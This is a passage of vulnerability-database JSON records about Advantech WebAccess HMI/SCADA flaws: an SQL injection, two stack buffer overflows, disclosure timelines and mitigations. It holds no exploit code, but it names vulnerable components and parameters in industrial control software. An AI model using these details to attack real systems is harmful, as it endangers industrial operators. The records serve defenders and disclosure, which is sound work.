"CNVD", "id": "CNVD-2017-23886" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" }, { "db": "NVD", "id": "CVE-2017-12710" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007575" } ] }, "credits": { "_id": null, "data": "Tenable Network Security", "sources": [ { "db": "ZDI", "id": "ZDI-17-712" } ], "trust": 0.7 }, "cve": "CVE-2017-12710", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-12710", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 9.4, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2017-12710", "impactScore": 9.2, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23886", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "526eff5a-fc92-4271-a592-23146544e85e", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-103260", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-12710", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12710", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12710", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2017-12710", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-23886", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201708-1277", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-103260", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "ZDI", "id": "ZDI-17-712" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "VULHUB", "id": "VHN-103260" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" }, { "db": "NVD", "id": "CVE-2017-12710" } ] }, "description": { "_id": null, "data": "A SQL Injection issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. By submitting a specially crafted parameter, it is possible to inject arbitrary SQL statements that could allow an attacker to obtain sensitive information. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within rmTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12710" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "ZDI", "id": "ZDI-17-712" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "VULHUB", "id": "VHN-103260" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-12710", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "ZDI", "id": "ZDI-17-712", "trust": 1.8 }, { "db": "BID", "id": "100526", "trust": 1.4 }, { "db": "TENABLE", "id": "TRA-2017-29", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201708-1277", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23886", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007575", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4548", "trust": 0.7 }, { "db": "IVD", "id": "526EFF5A-FC92-4271-A592-23146544E85E", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103260", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "ZDI", "id": "ZDI-17-712" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "VULHUB", "id": "VHN-103260" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" }, { "db": "NVD", "id": "CVE-2017-12710" } ] }, "id": "VAR-201708-1124", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "VULHUB", "id": "VHN-103260" } ], "trust": 1.582962455 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "CNVD", "id": "CNVD-2017-23886" } ] }, "last_update_date": "2024-11-23T21:53:49.852000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2017-23886)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101170" }, { "title": "Advantech WebAccess SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74366" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-712" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103260" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "NVD", "id": "CVE-2017-12710" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-712/" }, { "trust": 1.1, "url": "https://www.tenable.com/security/research/tra-2017-29" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12710" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12710" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-712" }, { "db": "CNVD", "id": "CNVD-2017-23886" }, { "db": "VULHUB", "id": "VHN-103260" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007575" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" }, { "db": "NVD", "id": "CVE-2017-12710" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e", "ident": null }, { "db": "ZDI", "id": "ZDI-17-712", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-23886", "ident": null }, { "db": "VULHUB", "id": "VHN-103260", "ident": null }, { "db": "BID", "id": "100526", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-007575", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201708-1277", "ident": null }, { "db": "NVD", "id": "CVE-2017-12710", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "ZDI", "id": "ZDI-17-712", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23886", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103260", "ident": null }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526", "ident": null }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007575", "ident": null }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1277", "ident": null }, { "date": "2017-08-30T18:29:00.657000", "db": "NVD", "id": "CVE-2017-12710", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-30T00:00:00", "db": "ZDI", "id": "ZDI-17-712", "ident": null }, { "date": "2017-09-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-23886", "ident": null }, { "date": "2017-11-10T00:00:00", "db": "VULHUB", "id": "VHN-103260", "ident": null }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526", "ident": null }, { "date": "2017-12-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007575", "ident": null }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1277", "ident": null }, { "date": "2024-11-21T03:10:04.470000", "db": "NVD", "id": "CVE-2017-12710", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1277" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007575" } ], "trust": 0.8 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "CNNVD", "id": "CNNVD-201708-1277" } ], "trust": 0.8 } }
var-201602-0473
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0473", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-139", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-139", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3162", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-139", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "id": "VAR-201602-0473", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:45:19.048000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-139" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-139" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-139" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-139" } ], "trust": 0.7 } }
var-201708-1577
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The length of the data provided by the user is not verified
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.4, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-562" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-562" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-562", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19443", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d5474ef5-dad6-4722-bd07-e73257c4f684", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d74524f-463f-11e9-b2e4-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-562", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19443", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-562" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The length of the data provided by the user is not verified", "sources": [ { "db": "ZDI", "id": "ZDI-17-562" }, { "db": "CNVD", "id": "CNVD-2017-19443" }, { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" } ], "trust": 1.53 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-562", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19443", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4082", "trust": 0.7 }, { "db": "IVD", "id": "D5474EF5-DAD6-4722-BD07-E73257C4F684", "trust": 0.2 }, { "db": "IVD", "id": "7D74524F-463F-11E9-B2E4-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-562" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ] }, "id": "VAR-201708-1577", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ], "trust": 1.41739574 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ] }, "last_update_date": "2022-05-17T01:46:25.048000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-562" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-562/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-562" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684", "ident": null }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-17-562", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19443", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": 